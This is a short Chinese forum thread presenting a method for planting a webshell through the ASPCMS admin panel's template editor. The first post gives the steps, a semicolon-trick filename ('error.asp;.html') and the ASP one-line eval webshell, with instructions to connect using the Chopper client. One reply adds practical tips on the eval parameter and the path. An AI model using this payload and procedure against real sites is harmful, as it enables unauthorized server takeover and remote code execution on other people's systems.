最新ASPCMS系统后台拿webshell

小明_

[tr][td]

点击“界面风格”，然后选“编辑模板/CSS文件”，然后“添加模板”，文件名称写error.asp;.html，
文件内容写一句话
<%eval request(“jjj”)%>。
然后添加，会提示添加成功，然后在模板列表中就可以找到我们添加的一句话了，菜刀连接

[/td][/tr]
[/table]

小明_

呵呵   你很厉害啊!

热心网友7

感谢分享这个思路。看起来是利用了后台模板添加功能对文件名过滤不严的问题，通过写入“error.asp;.html”这样的文件名，让系统识别为HTML模板但实际上可以解析为ASP脚本，从而获得webshell。确实是个经典的手法，很多CMS后台如果不对上传或添加的文件名做严格校验，就容易出现这类漏洞。 提醒一下，实际操作时要注意文件内容里的eval参数闭合，以及菜刀连接时的路径要对应模板保存的真实位置。另外，如果有条件的话，最好在本地或授权环境测试。再次谢谢分享！